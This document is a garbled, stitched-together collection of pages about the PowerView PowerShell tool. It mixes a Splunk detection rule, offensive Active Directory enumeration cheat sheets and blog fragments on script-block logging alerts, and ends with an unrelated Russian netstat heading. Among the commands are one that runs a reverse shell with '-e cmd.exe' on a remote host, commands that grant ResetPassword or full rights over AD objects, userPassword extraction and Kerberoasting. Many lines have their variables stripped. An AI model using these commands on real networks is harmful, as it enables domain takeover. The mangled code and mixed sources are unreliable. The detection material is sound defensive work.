Powerview.ps1

Introduction⌗

I know this is a lot, but bear with me as I tell you the whole story. If you are only interested in the juicy part, you can skip to ‘The case of split “PowerVi/ew”’.

MD ASLAM PRANG

Information Technology Assistant at Desh Link Lock Industries Limited

PowerView tools PowerShell Script.

PowerView Script Code

Help improve contributions

Contribution hidden for you

Insights from the community

Others also viewed

Explore topics

Try in Splunk Security Cloud

Description

Type: TTP
Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
Last Updated: 2024-05-18
Author: Mauricio Velazco, Splunk
ID: a44c0be1-d7ab-41e4-92fd-aa9af4fe232c

Annotations

ATT&CK

ID	Technique	Tactic
T1135	Network Share Discovery	Discovery

Kill Chain Phase

Exploitation

NIST

DE.CM

CIS20

CIS 10

CVE

Search


1
2
3
4
5
`powershell` EventCode=4104  (ScriptBlockText=Invoke-ShareFinder*) 
| stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `windows_file_share_discovery_with_powerview_filter`

Macros

Required fields

List of fields required to use this analytic.

_time
EventCode
ScriptBlockText
Opcode
Computer
UserID

How To Implement

Known False Positives

Associated Analytic Story

RBA

Risk Score	Impact	Confidence	Message
48.0	60	80	Invoke-ShareFinder commandlet was executed on $Computer$

Reference

Test Dataset

Replay any dataset to Splunk Enterprise by using our replay.py tool or the UI.
Alternatively you can replay a dataset into a Splunk Attack Range

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

SharpView is a .NET port of PowerView

#Basic domain info
#Get all domain trusts (parent, children and external)
#Find interesting ACLs

# Domain Info
#Get info about the current domain
#Get info about the current domain

#Get domain SID
#Get info about the policy
#Kerberos tickets info(MaxServiceAge)

#Check your privileges
# Same as Get-DomainPolicy
# Domain Controller
#Get all ifo of specific domain Domain Controller
# Get Forest info


## Get-DomainGroup is similar to Get-NetGroup 

#Get groups of an specific domain
#Get restricted groups
# Get all domain maes of computers
## Get-DomainComputer is kind of the same as Get-NetComputer
#Get all computer objects
#Send a ping to check if the computers are working
#DCs always appear but aren't useful for privesc
#Find computers with Constrined Delegation
## Get-DomainOU is kind of the same as Get-NetOU
#Get Organization Units

Logon and Sessions

#Get active sessions on the host

Group Policy Object – GPOs

#Get all policies with details
#Get the policy applied in a computer
#Get current policy
# Get who can create new GPOs
# COnvert GPO GUID to name

# Transform SID to name
# Get GPO of an OU
# Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.

Learn how to exploit permissions over GPOs and ACLs in:

Abusing Active Directory ACLs/ACEs

#Get ACLs of an object (permissions of other objects over the indicated one)
#Other way to get ACLs of an object
#Get permissions of a file

#Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects

#Get all domain trusts (parent, children and external)
#Enumerate also all the trusts
# Get basic forest info
#Get info of current forest (no external)
#Get info about the external forest (if possible)
Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)
#Get groups with privileges in other domains inside the forest

# for all the targeted machines on the current (or specified) domain.

#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
'isDeleted -eq $true'

SID to Name

Use different credentials (argument)

# use an alterate creadential for any function

# if running in -sta mode, impersonate another credential a la "runas /netonly"

# Set the owner of 'dfm' in the current domain to 'harmj0y'

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

PowerView is a PowerShell script to perform common Active Directory enumeration and exploitation tasks. This article lists some common PowerView enumeration commands.

You can obtain a copy of PowerView here; https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1.

There is also a .NET port of PowerView, called SharpView in case usage of PowerShell isn’t an option. This can be downloaded here; https://github.com/tevora-threat/SharpView

ADModule

In addition to PowerView commands, I’ve also listed the equivalent commands using Microsoft.ActiveDirectory.Management.dll.

The benefit of this approach over PowerView is we’re using a Microsoft signed executable, which reduces our chance of getting detected on disk. Unfortunately, the DLL can’t perform all the tasks that PowerView can.

A copy of this DLL can be obtained here; https://github.com/samratashok/ADModule

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

PowerView Commands

Domain Information

PowerView Command	ADModule	Purpose
Get-Domain	Get-ADDomain	Find the current domain
Get-DomainSID	(Get-ADDomain).DomainSID	Find the current domain’s SID
Get-DomainPolicyData	(Get-DomainPolicyData).systemaccess	Returns the default domain policy or the domain controller policy for the current domain
Get-DomainController	Get-ADDomainController	Find the current domain controllers
Get-DomainOU	Get-ADOrganizationalUnit -Filter * -Properties *	List organisational units in the domain

Enumerating Users, Groups & Computers

PowerView Command	ADModule	Purpose
Get-DomainUser \| select samaccountname	Get-ADUser -Filter * -Properties *	List users in current domain
Get-DomainComputer	Get-ADComputer -Filter * \| select Name	List computers in the domain
Get-DomainGroup \| select Name	Get-ADGroup -Filter * \| select Name	List groups in the domain
Get-DomainGroupMember -Identity “Domain Admins” -Recurse	Get-ADGroupMember -Identity “Domain Admins” -Recursive	Find members of the domain admin group
Get-NetLocalGroup -ComputerName Computer1 -ListGroups		List local groups on remote computer (requires admin privileges)

Domain Trust Enumeration

PowerView Command	ADModule	Purpose
Get-NetDomainTrust	Get-ADDomain	Get trusts for the current domain
Get-NetForest	Get-ADForest	List forest details
Get-NetForestDomain		List all domains in forest
Get-NetForestTrust		Map forest trusts

Share Enumeration

PowerView Command	Purpose
Get-NetShare -ComputerName sqlserver	List shares on a machine
Invoke-ShareFinder	Search for shares on the network
Invoke-FileFinder	Search for files on the network
Get-NetFileServer	List file servers in the domain

User Hunting

PowerView Command	Purpose
Get-NetLoggedonLocal -ComputerName Computer1	Find logged in users using the remote registry service (which is started by default on Windows server). Does not require admin privileges.
Invoke-UserHunter -CheckAccess	Check if domain administrators are logged into workstations

GPO Enumeration

PowerView Command	Purpose
Get-DomainGPO	List group policy objects in a domain
Get-DomainGPOLocalGroup	Returns all GPOs in a domain that modify local group memberships through ‘Restricted Groups’ or Group Policy preferences

ACL Enumeration

PowerView Command	Purpose
Get-DomainObjectAcl -SamAccountName test -ResolveGUIDs	Get an ACL for a specific object
Find-InterestingDomainAcl -ResolveGUIDs	Find interesting domain ACL’s

Kerberos Delegation

PowerView Command	Purpose
Get-DomainComputer -Unconstrained	Check for unconstrained delegation hosts
Get-DomainUser -TrustedToAuth	Check for constrained delegation hosts

Automating PowerView ACL Enumeration

Function Invoke-ACLChecks {
Write-Host ("Checking for GenericALL ACL's")
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq$("$env:UserDomain\$env:Username")) {$_}}

Write-Host ("Checking for WriteDACL's")
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Write-Host ("Checking for unconstrained delegation")
Get-DomainComputer -Unconstrained

Write-Host ("Checking for constrained delegation")
Get-DomainUser -TrustedToAuth

Write-Host ("Checks done")
}

Get-DomainGroup -MemberIdentity adunn   name

Recursive Group Membership

Get-DomainGroupMember function will retrieve group-specific information. Adding the -Recurse switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) to list out the members of those groups.

Check for users with the SPN attribute set, which indicates that the account may be subjected to a Kerberoasting attack.

Import-Module .owerView.ps1

  
  
  ConvertTo-SecureString  -AsPlainText -Force
  New-Object System.Management.Automation.PSCredential , 
Invoke-Command -ComputerName :computername -Credential  -ScriptBlock C:netpubwwrootc.exe -nd .168.45.5  -e cmd.exe

Commands

Command	Description
Export-PowerViewCSV	Append results to a CSV file
ConvertTo-SID	Convert a User or group name to its SID value
Get-DomainSPNTicket	Requests the Kerberos ticket for a specified Service Principal Name (SPN) account
Domain/LDAP Functions
Get-Domain	Will return the AD object for the current (or specified) domain
Get-DomainController	Return a list of the Domain Controllers for the specified domain
Get-DomainUser	Will return all users or specific user objects in AD
Get-DomainComputer	Will return all computers or specific computer objects in AD
Get-DomainGroup	Will return all groups or specific group objects in AD
Get-DomainOU	Search for all or specific OU objects in AD
Find-InterestingDomainAcl	Finds object ACLs in the domain with modification rights set to non-built in objects
Get-DomainGroupMember	Will return the members of a specific domain group
Get-DomainFileServer	Returns a list of servers likely functioning as file servers
Get-DomainDFSShare	Returns a list of all distributed file systems for the current (or specified) domain
GPO Functions
Get-DomainGPO	Will return all GPOs or specific GPO objects in AD
Get-DomainPolicy	Returns the default domain policy or the domain controller policy for the current domain
Computer Enumeration Functions
Get-NetLocalGroup	Enumerates local groups on the local or a remote machine
Get-NetLocalGroupMember	Enumerates members of a specific local group
Get-NetShare	Returns open shares on the local (or a remote) machine
Get-NetSession	Will return session information for the local (or a remote) machine
Test-AdminAccess	Tests if the current user has administrative access to the local (or a remote) machine
Threaded ‘Meta’-Functions
Find-DomainUserLocation	Finds machines where specific users are logged in
Find-DomainShare	Finds reachable shares on domain machines
Find-InterestingDomainShareFile	Searches for files matching specific criteria on readable shares in the domain
Find-LocalAdminAccess	Find machines on the local domain where the current user has local administrator access
Domain Trust Functions
Get-DomainTrust	Returns domain trusts for the current domain or a specified domain
Get-ForestTrust	Returns all forest trusts for the current forest or a specified forest
Get-DomainForeignUser	Enumerates users who are in groups outside of the user’s domain
Get-DomainForeignGroupMember	Enumerates groups with users outside of the group’s domain and returns each foreign member
Get-DomainTrustMapping	Will enumerate all trusts for the current domain and any others seen.

Script location

new version

wget https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1

old version

local on kali

from github fork

PowerView-3.0-tricks.ps1

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set
#       Add : add a new object to a destination
#       Set : modify a given object
#       Invoke : lazy catch-all
#   Nouns:
#       Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
#       Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
#       Verb-Net* : indicates that Win32 API access is being used under the hood



Get-DomainGroup -MemberIdentity <User/Group>

# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity  -Recurse

# use an alterate creadential for any function
  ConvertTo-SecureString  -AsPlainText -Force
  New-Object System.Management.Automation.PSCredential, 
Get-DomainUser -Credential 

# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink   % Get-DomainComputer -SearchBase .distinguishedname -Properties dnshostname


  Get-Date.AddYears-1.ToFileTime
Get-DomainUser -LDAPFilter  -Properties samaccountname,pwdlastset


Get-DomainUser -LDAPFilter  -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname


Get-DomainUser -LDAPFilter 
Get-DomainUser -UACFilter ACCOUNTDISABLE


Get-DomainUser -LDAPFilter 
Get-DomainUser -UACFilter SMARTCARD_REQUIRED


Get-DomainUser -LDAPFilter  -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname

# use multiple identity types for any *-Domain* function
, ,,  Get-DomainUser -Properties samaccountname,lastlogoff


Get-DomainUser -SPN


Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH


Get-DomainUser -SPN  ?.memberof -match 


Get-DomainUser -LDAPFilter 


Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth


  Get-DomainComputer -Unconstrained
  Get-DomainUser -AllowDelegation -AdminCount

# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local

# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local


Invoke-Kerberoast -SearchBase 



Find-DomainUserLocation -ComputerUnconstrained -ShowAll


Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# find all computers in a given OU
Get-DomainComputer -SearchBase 


Get-DomainOU -Identity *server* -Domain <domain>  %Get-DomainComputer -SearchBase .distinguishedname -Properties dnshostname  %Get-NetLoggedOn -ComputerName 

# enumerate all gobal catalogs in the forest
Get-ForestGlobalCatalog

# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt  % Get-DomainComputer -SearchBase  -LDAP  -Properties dnshostname

# enumerate the current domain controller policy
  Get-DomainPolicy -Policy DC
.PrivilegeRights 

# enumerate the current domain policy
  Get-DomainPolicy -Policy Domain
.KerberosPolicy # useful for golden tickets ;)
.SystemAccess # password age/etc.



Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>


Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP

# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping  %.computers  .computers -join    Export-CSV -NoTypeInformation gpo_map.csv

# use alternate credentials for searching for files on the domain

    ConvertTo-SecureString -AsPlainText -Force
  New-Object System.Management.Automation.PSCredential,
Find-InterestingDomainShareFile -Domain DOMAIN -Credential 


Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local


Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose


Get-DomainObjectAcl -SearchBase  -ResolveGUIDs


Add-DomainObjectAcl -TargetIdentity  -PrincipalIdentity matt -Rights All


Get-DomainObjectAcl  -ResolveGUIDs  ? 
    .ObjectType -match  -or .ActiveDirectoryRights -match 


# find linked DA accounts using name correlation
Get-DomainGroupMember   %Get-DomainUser .membername -LDAPFilter   %.displayname.split..1 -join  Get-DomainUser -LDAPFilter  -Properties displayname,samaccountname

# save a PowerView object to disk for later usage
Get-DomainUser  Export-Clixml user.xml
  Import-Clixml user.xml

# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount  Get-DomainGroupMember -Recurse  ?.MemberName -like 


Get-DomainObjectAcl -LDAPFilter   ?  .SecurityIdentifier -match  -and .ActiveDirectoryRights -match 

# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name


#   query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
  Get-DomainObject -Properties objectsid,distinguishedname -SearchBase  -LDAPFilter   ? .objectsid -match   Select-Object -ExpandProperty distinguishedname
  @
  ForEach   
    
      .SubString.IndexOf -replace , -replace ,
    # check if we've already enumerated this domain
     -not  
          
        # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
           +  -join  + 
        Get-DomainGroup -Domain  -Scope DomainLocal -LDAPFilter  -Properties distinguishedname,member
    

  fl

# if running in -sta mode, impersonate another credential a la "runas /netonly"
  ConvertTo-SecureString  -AsPlainText -Force
  New-Object System.Management.Automation.PSCredential, 
Invoke-UserImpersonation -Credential 

Invoke-RevertToSelf

# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Get-DomainComputer -FindOne  Find-DomainObjectPropertyOutlier


Set-DomainObject testuser -Set @ -Verbose

# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y


Get-ObjectACL  -ResolveGUIDs  ? 
    .ActiveDirectoryRights -match  -or .ObjectAceType -match 



-1Get-DomainUser -LDAPFilter  -Properties samaccountname,memberof,userPassword  % Add-Member -InputObject  NoteProperty  System.Text.Encoding::ASCII.GetString.userPassword -PassThru  fl

More script blocks -> Less alerts??⌗

Rule / Run#Blocks	9#39	10#47	4#49	1#54	7#55	3#57	6#57	5#64	8#69	2#76	AVG
Total	79	91	94	103	99	106	107	110	119	126	103.4
Execute Invoke-command on Remote Host	5	6	6	6	6	7	6 [2]	7	7	7	6.3
Malicious PowerShell Commandlets – ScriptBlock	35	42	43	49	46	51	51	53	58	61	48.9
Malicious PowerShell Keywords	3	2	2	2	2	2	3	2	3	2	2.3
Manipulation of User Computer or Group Security Principals Across AD	4	4	4	6 [3]	4	4	4	4	4	<5>	4.3
Potential In-Memory Execution Using Reflection.Assembly	1	1	1	1	1	1	1	1	1	1	1
Potential Suspicious PowerShell Keywords	1 [1]	2	2	2	2	2	2	2	2	2	1.9
PowerView PowerShell Cmdlets – ScriptBlock	27	30	32	34	35	35	36	38	40	45	35.2
Request A Single Ticket via PowerShell	1	1	1	1	1	1	1	1	<2> +1 because of script block cut-off	1	1.1
Usage Of Web Request Commands And Cmdlets – ScriptBlock	1	1	1	1	1	1	1	1	1	1	1

First, let’s look at some results that were expected.

Okay, so these results are kind of expected and not too bad. So we should be fine, right?

The case of split “PowerVi/ew”⌗

Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment\n
$LocalGroup.PSObject.TypeNames.Insert(0, 'PowerVi

ew.LocalGroup.API')\n

The Uncertainty of Script Block Logging⌗

Run	1	2	3	4	5	6	7	8	9	10
# Blocks	54	76	57	49	64	57	55	69	39	47

More script blocks -> More alerts?⌗

Blocks	39	47	49	54	55	57	57	64	69	76
Alarms	79	91	94	103	99	106	107	110	119	126
… raised on … blocks	39	46	48	53	53	56	56	60	65	70

Conclusion⌗

Is there a remedy? Maybe re-combining script fragments (like this) to run detection mechanisms on the reconstructed scripts?

:/> Утилита netstat или как определить какие порты слушает ваш компьютер. Сетевые утилиты 4 часть | Настройка серверов windows и linux